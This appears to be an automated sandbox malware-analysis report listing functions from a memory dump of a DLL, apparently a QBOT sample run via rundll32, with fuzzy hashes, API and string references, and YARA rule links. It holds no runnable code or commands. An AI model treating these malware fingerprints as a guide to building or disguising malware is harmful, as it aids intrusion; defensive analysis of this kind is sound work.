Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766fee892abcdd184b753aabadc84f9169730b4caa204f54eb7b665d7fab028d
Instruction ID: df671b935b9de51f34eab4ecbecfcee19f022cede73c8c02bb2254cf0852d286
Opcode Fuzzy Hash: 766fee892abcdd184b753aabadc84f9169730b4caa204f54eb7b665d7fab028d
Instruction Fuzzy Hash: 13027071908712CBC324DF29C48056BF7F1FF98701F068A2EE9D99B691E774A504CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6ADAACE0 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb29f4f83f96f10b57247a4e245e378bcbca1f01bb03e96992d4c139055477f
Instruction ID: 08164c3520fe84e7db1f8187aa699682728efeeda4d098d6e27e086dc2b2d681
Opcode Fuzzy Hash: 7cb29f4f83f96f10b57247a4e245e378bcbca1f01bb03e96992d4c139055477f
Instruction Fuzzy Hash: 13C190729087159BC328CF28C58022BF7E1FF95705F068A6EE9C58B2A1E735E905CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6ADB3D50 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 689124f1c0e529a35433716c60f009670efef5b3d9363f5ef2cc53f24d38dee5
Instruction ID: 6d9ecd41a777639d658862e96072335231d6a508fac0deba82a59c9c78467849
Opcode Fuzzy Hash: 689124f1c0e529a35433716c60f009670efef5b3d9363f5ef2cc53f24d38dee5
Instruction Fuzzy Hash: 06F065C6B5450347F356416F0D90793558B97C0724F73C438A81BD3B50E975C845B110

Uniqueness

Uniqueness Score: -1.00%

Function 6AD81F50 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac5fa32d7461fe5cca9e8ed7ed895995d4191905422ce670572497a3d28479bd
Instruction ID: d21f0b0c9f83078936a90973a99dff4a706cf9a84358e083aeb105e761798b8b
Opcode Fuzzy Hash: ac5fa32d7461fe5cca9e8ed7ed895995d4191905422ce670572497a3d28479bd
Instruction Fuzzy Hash: D4F0A9F0A88108EFC768CF5DC890D9977B4AB0A318F4240D4E4A5AB761EB32ED40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6ADA0270 Relevance: 61.7, APIs: 34, Strings: 1, Instructions: 462COMMON

Download Yara Rule

APIs

ldiv_round_up.050_QBOT ref: 6ADA036D
ldiv_round_up.050_QBOT ref: 6ADA038A
ldiv_round_up.050_QBOT ref: 6ADA03B4
ldiv_round_up.050_QBOT ref: 6ADA03CA
ldiv_round_up.050_QBOT ref: 6ADA0503
ldiv_round_up.050_QBOT ref: 6ADA0526
ldiv_round_up.050_QBOT ref: 6ADA05E4
ldiv_round_up.050_QBOT ref: 6ADA05FC

Strings

T, xrefs: 6ADA04C2

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: ldiv_round_up
String ID: T
API String ID: 4072909692-3187964512
Opcode ID: a071a4c00f19c7b7ce4da8639aea14776ed4875d2a2e861e419adeeca33db29a
Instruction ID: e2670bf71c81c8e112190d1212c2ed54c202870f1b43dee4de2f03395455d403
Opcode Fuzzy Hash: a071a4c00f19c7b7ce4da8639aea14776ed4875d2a2e861e419adeeca33db29a
Instruction Fuzzy Hash: 2A2204B0A05B05DFD724CF28C18875EBBE0BB89748F02892DD6C58B741EB75E948CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6ADC4CA0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 180fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6ADC4CCB
vfprintf.MSVCRT ref: 6ADC4CE7
abort.MSVCRT ref: 6ADC4CEC
VirtualQuery.KERNEL32 ref: 6ADC4DA4
VirtualQuery.KERNEL32 ref: 6ADC4DD8
memcpy.MSVCRT ref: 6ADC4E01

Strings

@, xrefs: 6ADC4EB7
VirtualQuery failed for %d bytes at address %p, xrefs: 6ADC4F17, 6ADC4F43
Address %p has no image-section, xrefs: 6ADC4F2B
VirtualProtect failed with code 0x%x, xrefs: 6ADC4EEB

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: QueryVirtual$abortfwritememcpyvfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$@$Address %p has no image-section
API String ID: 3828011698-1098444051
Opcode ID: aaccc6ae1bd24cfccfa11b99ed98473f56a72907cd53e24bfdfe633ba1a4be32
Instruction ID: 863c7aacf0a316b51e3d97c23f2c3647a93b2d5072d4370d178310ae1a9909d3
Opcode Fuzzy Hash: aaccc6ae1bd24cfccfa11b99ed98473f56a72907cd53e24bfdfe633ba1a4be32
Instruction Fuzzy Hash: 1D71C8B49093019FD700DF29D18861ABBF4BB89758F82895DE489C7311EB34E984CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6ADA0A60 Relevance: 18.3, APIs: 12, Instructions: 289COMMON

Download Yara Rule

APIs

lpeg_calc_output_dimensions.050_QBOT ref: 6ADA0A94

Part of subcall function 6ADA0270: ldiv_round_up.050_QBOT ref: 6ADA036D
Part of subcall function 6ADA0270: ldiv_round_up.050_QBOT ref: 6ADA038A

linit_1pass_quantizer.050_QBOT ref: 6ADA0C52
linit_2pass_quantizer.050_QBOT ref: 6ADA0C70
linit_inverse_dct.050_QBOT ref: 6ADA0C8B
linit_huff_decoder.050_QBOT ref: 6ADA0CAD
linit_d_coef_controller.050_QBOT ref: 6ADA0CD3
linit_color_deconverter.050_QBOT ref: 6ADA0D88
linit_upsampler.050_QBOT ref: 6ADA0D90
linit_d_post_controller.050_QBOT ref: 6ADA0DA0
linit_phuff_decoder.050_QBOT ref: 6ADA0DAA
linit_merged_upsampler.050_QBOT ref: 6ADA0DB5
linit_d_main_controller.050_QBOT ref: 6ADA0DCD

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: ldiv_round_up$linit_1pass_quantizerlinit_2pass_quantizerlinit_color_deconverterlinit_d_coef_controllerlinit_d_main_controllerlinit_d_post_controllerlinit_huff_decoderlinit_inverse_dctlinit_merged_upsamplerlinit_phuff_decoderlinit_upsamplerlpeg_calc_output_dimensions
String ID:
API String ID: 219111258-0
Opcode ID: 8f8d645404bace55164931a3bfce681cf05279c310a77323abab86c2d1772ee9
Instruction ID: c0387bdecfaaaa072bb99cd075e73faf0a0dabea441fd23d5f9541578158eca5
Opcode Fuzzy Hash: 8f8d645404bace55164931a3bfce681cf05279c310a77323abab86c2d1772ee9
Instruction Fuzzy Hash: ACC1B175908381CEEB158F28C4983967BA1BF01348F4B46A9DE984F397DBB9D484C791

Uniqueness

Uniqueness Score: -1.00%

Function 6AD81040 Relevance: 16.6, APIs: 11, Instructions: 142sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,00000000,?,6AD813F7), ref: 6AD81078
InterlockedCompareExchange.KERNEL32 ref: 6AD81094
_amsg_exit.MSVCRT ref: 6AD810B2
Sleep.KERNEL32(?,?,?,?,00000000,?,6AD813F7), ref: 6AD810F5
InterlockedCompareExchange.KERNEL32 ref: 6AD8110D

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: CompareExchangeInterlockedSleep$_amsg_exit
String ID:
API String ID: 4147465460-0
Opcode ID: bac6e01a1ad78b942d5311be2141cf2e20617ede113cd59077056fcba15d0403
Instruction ID: 3f6f46b6578e8aa65eee795ddd52488bf0bb15b77957d4d50d28a2e0bcf6b46e
Opcode Fuzzy Hash: bac6e01a1ad78b942d5311be2141cf2e20617ede113cd59077056fcba15d0403
Instruction Fuzzy Hash: 265120F1548341CBEB00AF68D58571B7BF4BB41758F838A5DE89487344DB7698888BA3

Uniqueness

Uniqueness Score: -1.00%

Function 6AD8C240 Relevance: 15.1, APIs: 10, Instructions: 53COMMON

Download Yara Rule

APIs

linit_c_master_control.050_QBOT ref: 6AD8C253
linit_forward_dct.050_QBOT ref: 6AD8C268
linit_huff_encoder.050_QBOT ref: 6AD8C282
linit_c_coef_controller.050_QBOT ref: 6AD8C2A8
linit_c_main_controller.050_QBOT ref: 6AD8C2B8
linit_marker_writer.050_QBOT ref: 6AD8C2C0
linit_phuff_encoder.050_QBOT ref: 6AD8C2E0
linit_color_converter.050_QBOT ref: 6AD8C2F5
linit_downsampler.050_QBOT ref: 6AD8C2FD
linit_c_prep_controller.050_QBOT ref: 6AD8C30D

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: linit_c_coef_controllerlinit_c_main_controllerlinit_c_master_controllinit_c_prep_controllerlinit_color_converterlinit_downsamplerlinit_forward_dctlinit_huff_encoderlinit_marker_writerlinit_phuff_encoder
String ID:
API String ID: 940071744-0
Opcode ID: 067cbd41030120c24c9dc2e3ecb1a72afdd8091d4aeeba82ff68ce232f3d6047
Instruction ID: e18b3151966e1939f1b37eac17263b751a1124d1ccf2fe6d581c25418835d927
Opcode Fuzzy Hash: 067cbd41030120c24c9dc2e3ecb1a72afdd8091d4aeeba82ff68ce232f3d6047
Instruction Fuzzy Hash: 6C11A2F040C780DAD750AF7884C875EBAE0BF06708F47596DD8C94B287CB789484DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6AD902A0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 366COMMON

Download Yara Rule

APIs

lpeg_add_quant_table.050_QBOT ref: 6AD902FB
lpeg_add_quant_table.050_QBOT ref: 6AD90323

Strings

2, xrefs: 6AD90308

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: lpeg_add_quant_table
String ID: 2
API String ID: 126673837-450215437
Opcode ID: e94ca69451cebde285347c56735baed99eb44625613ff43082a63bca312c40b4
Instruction ID: e6c5f4e15193e5d4d88a427fddf35b49f97a2a12a02e07099df601144bb54bd3
Opcode Fuzzy Hash: e94ca69451cebde285347c56735baed99eb44625613ff43082a63bca312c40b4
Instruction Fuzzy Hash: 09F15775A08240DFE754DF28D094B967FF2BF86304F4684A8D8888F396DB78D945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6AD94AE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

lpeg_suppress_tables.050_QBOT ref: 6AD94B10
linit_c_master_control.050_QBOT ref: 6AD94B38
linit_huff_encoder.050_QBOT ref: 6AD94B5A
lpeg_write_tables.050_QBOT ref: 6AD94BB9
linit_marker_writer.050_QBOT ref: 6AD94C15
linit_phuff_encoder.050_QBOT ref: 6AD94C46

Strings

D, xrefs: 6AD94B65

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: linit_c_master_controllinit_huff_encoderlinit_marker_writerlinit_phuff_encoderlpeg_suppress_tableslpeg_write_tables
String ID: D
API String ID: 2280938414-2746444292
Opcode ID: 203de22d7259de9f947a99f002044e9b7749fa9c38b2387a9ba707c46adb9b6b
Instruction ID: f7542c68cc969b726b4af2d78036eb91490fb35bdc98df071e17cc679fca549a
Opcode Fuzzy Hash: 203de22d7259de9f947a99f002044e9b7749fa9c38b2387a9ba707c46adb9b6b
Instruction Fuzzy Hash: 83418EB4505B00DFD754DF24C5C878ABBE0BF48308F02896ED99A8B316DB74E584CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6AD8F7F0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 209COMMON

Download Yara Rule

Strings

$, xrefs: 6AD8F806

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 9aea1e327d18141519636dc1b8d95b704eb7b22057aa2022c2894bf34df2473c
Instruction ID: 1eab7fab485df9b0d148d5bed4839e1b7ed347ef04f2027a3b88c764c343b39f
Opcode Fuzzy Hash: 9aea1e327d18141519636dc1b8d95b704eb7b22057aa2022c2894bf34df2473c
Instruction Fuzzy Hash: 8DA1C3B0604301CFDB54DF29C084B5ABBE1BF49304F1684ADD8898F356DB75E989CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ADAF3E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

lpeg_mem_init.050_QBOT(?,?,?,?,?,?,?,?,6AD81660), ref: 6ADAF3F3
lpeg_get_small.050_QBOT ref: 6ADAF407
getenv.MSVCRT ref: 6ADAF4AB
sscanf.MSVCRT ref: 6ADAF4D4

Strings

T, xrefs: 6ADAF3F8
x, xrefs: 6ADAF4CF

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: getenvlpeg_get_smalllpeg_mem_initsscanf
String ID: T$x
API String ID: 3544873372-1002588118
Opcode ID: db5ad559ac98bae7df72a89b57da7feb99cf654f11486630b3f8bb31fe28f1f8
Instruction ID: 5d0387d6458e81ada940056cb392f5bbf3adec300b29f5bae941133d5d4cb07e
Opcode Fuzzy Hash: db5ad559ac98bae7df72a89b57da7feb99cf654f11486630b3f8bb31fe28f1f8
Instruction Fuzzy Hash: D631EDB00087108FEB40DF15C19534ABBE4AF49304F52898DEA988F39AEB79D585CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 6ADB2B20 Relevance: 9.1, APIs: 6, Instructions: 74COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 6ADB2B36
getenv.MSVCRT ref: 6ADB2B5A
getenv.MSVCRT ref: 6ADB2B7E
getenv.MSVCRT ref: 6ADB2BA2
getenv.MSVCRT ref: 6ADB2BC2
getenv.MSVCRT ref: 6ADB2BE2

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: getenv
String ID:
API String ID: 498649692-0
Opcode ID: 51101371f779dc29345ce9728112d4cac38d16c5d9db5d12594e895d415b906f
Instruction ID: 3fa1cd730f1959ed6a166857b2401a12dad7c2ce6527365fe1cf0b070ae3f8cc
Opcode Fuzzy Hash: 51101371f779dc29345ce9728112d4cac38d16c5d9db5d12594e895d415b906f
Instruction Fuzzy Hash: 312193F3644105D3EB103F21856E33525A9AB4236AFC708ADC4978B75AEF39C841D367

Uniqueness

Uniqueness Score: -1.00%

Function 6ADC4F50 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 6ADC4F17, 6ADC4F43, 6ADC51D7
Unknown pseudo relocation bit size %d., xrefs: 6ADC503E
Unknown pseudo relocation protocol version %d., xrefs: 6ADC51EB

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
API String ID: 0-974437099
Opcode ID: 9ad28d4d323b674a2e2dcd1cd8893c3567945a917d25b34cad8fe9ba4ef76f9f
Instruction ID: 332497999dc6db8bd7d5c1b3476d49a9780cdf6b5e80ca64d9d5470ff6f69c52
Opcode Fuzzy Hash: 9ad28d4d323b674a2e2dcd1cd8893c3567945a917d25b34cad8fe9ba4ef76f9f
